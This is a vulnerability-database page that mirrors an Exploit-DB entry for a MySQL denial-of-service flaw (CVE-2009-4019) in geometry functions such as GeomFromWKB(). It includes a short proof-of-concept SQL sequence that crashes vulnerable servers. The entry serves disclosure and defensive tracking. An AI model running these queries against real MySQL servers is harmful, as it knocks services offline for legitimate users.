Lucene search

K

MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service

πŸ—“οΈΒ 23 Nov 2009Β 00:00:00Reported byΒ Shane BesterTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 47Β Views

MySQL 6.0.9 'GeomFromWKB()' Function Do

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2009-4019
30 Nov 200917:30
–nvd
Cvelist
CVE-2009-4019
30 Nov 200917:00
–cvelist
UbuntuCve
CVE-2009-4019
30 Nov 200900:00
–ubuntucve
Veracode
Denial Of Service (DoS)
10 Apr 202000:43
–veracode
CVE
CVE-2009-4019
30 Nov 200917:30
–cve
seebug.org
MySQL SELECTθ―­ε₯ε€„η†ζ‹’η»ζœεŠ‘ζΌζ΄ž
2 Dec 200900:00
–seebug
seebug.org
MySQL倚δΈͺη•Έε½’SQLζ“δ½œε€„η†ζ‹’η»ζœεŠ‘ζΌζ΄ž
17 Dec 200900:00
–seebug
seebug.org
MySQL vulnerabilities
13 Feb 201000:00
–seebug
Tenable Nessus
Fedora 10 : mysql-5.0.88-1.fc10 (2009-12180)
14 Dec 200900:00
–nessus
Tenable Nessus
Fedora 11 : mysql-5.1.41-2.fc11 (2009-13504)
22 Dec 200900:00
–nessus
Rows per page
source: https://www.securityfocus.com/bid/37297/info
 
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
 
An attacker can exploit these issues to crash the application, denying access to legitimate users.
 
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values 
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where 
`c0` <>  (select geometrycollectionfromwkb(`c3`) from `t1`);

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Nov 2009 00:00Current
7.4High risk
Vulners AI Score7.4
47
.json
Report